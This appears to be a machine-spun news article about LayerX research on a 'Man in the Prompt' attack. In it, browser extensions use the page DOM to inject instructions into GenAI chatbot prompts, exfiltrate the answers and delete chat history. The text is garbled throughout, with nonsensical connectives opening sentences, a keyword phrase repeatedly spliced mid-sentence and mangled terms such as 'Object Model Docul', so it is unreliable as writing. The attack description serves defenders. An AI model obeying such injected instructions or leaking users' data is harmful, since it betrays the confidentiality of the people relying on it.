Nevertheless,
Ia chatbots: extensions allow confidential:
Layerx researchers reveal that browser extensions can make it possible to inject. Similarly, extract data into conversations with Genai assistants, including in professional environments supposed to be secure.
The Cybersecurity Company Layerx has recently highlighted an unprecedented method to compromise the confidentiality of interactions with generative artificial intelligence tools. Therefore, whether commercial or developed internally. Similarly, This attack targets a vector so far neglected: browser extensions. For example, Omnipresent in professional environments, the latter represent a particularly large and low -monitored attack surface. Moreover, According to Layerx, 99 % of business users use extensions and almost half of them have more than ten extensions installed. For example, The risk is all the higher since AI assistants are now used to handle sensitive information: source code. Nevertheless, legal documents, HR files, business strategies or financial reports.
Dom Open. However, data in danger – Ia chatbots: extensions allow confidential
Called “Man in ia chatbots: extensions allow confidential the prompt”, the flaw identified by Layerx takes advantage of how AI assistants are integrated into browsers. The prompt entry field. which allows the user to interact with models like Chatgpt, Google Gemini or Claude, is part of the DOM (Object Model Docul) on the web page. Any extension installed in the browser can access it, even without specific authorization. The plugin thus diverted can inject instructions into prompts. recover the answers generated by the model, or even erase all traces of its passage by removing the history of exchanges.
Layerx led tests on the main Genai chatbots on the market. including Chatgpt, Gemini, Claude, Copilot, Deepseek, as well as on personalized internal tools. In each case, the researchers were able to demonstrate that malicious extensions could compromise exchanges with AI. Some tools have shown partial resistance, but none can completely block injection or exfiltration.
Concept evidence to concrete implications
ia chatbots: extensions allow confidential
Two exploitation scenarios illustrate the scope of this fault: in the first. an extension on Chatgpt questions the model, exfiltrates the answer, then erases the history; In the second, an integrated extension to Google Workspace operates Gemini to extract sensitive content – such as email, documents or meetings of meetings – even when the gemini interface is inactive. Layerx claims to have informed Google de la Faille. According to the researchers. although certain protections have been added to Gemini, the specific risk linked to browser extensions would remain untreated.
Often enriched with confidential data. deployed in environments deemed secure, internal AI assistants remain vulnerable as soon as the user browser hosts a malicious extension. Compromise occurs locally, without crossing network borders, which would make attack difficult to detect with traditional tools. Classic safety solutions (Type DLP, CASB, SWG) would indeed have no visibility on manipulations carried out at the DOM ia chatbots: extensions allow confidential level. They do not detect the prompt injects or the data stolen output.
Layerx calls for a new approach to the safety of generative AI tools: surveillance of DOM interactions. behavioral detection of extensions and alerts in real time on manipulations or data leaks.
Further reading: A new leak reveals one of the next free games of the Epic Games Store – First title for the Icelandic Ragga Kristinsdottir in Sweden, New Top 10 for Charlotte Liautier – Terrestrial observation: this ultra-preccimate space radar will track down glaciers and landslides – Xiaomi Redmi Note 13 Pro: The offer on this smartphone is the star of this Saturday – Amazon strikes hard with 300 euros reduction on the Google Pixel 9.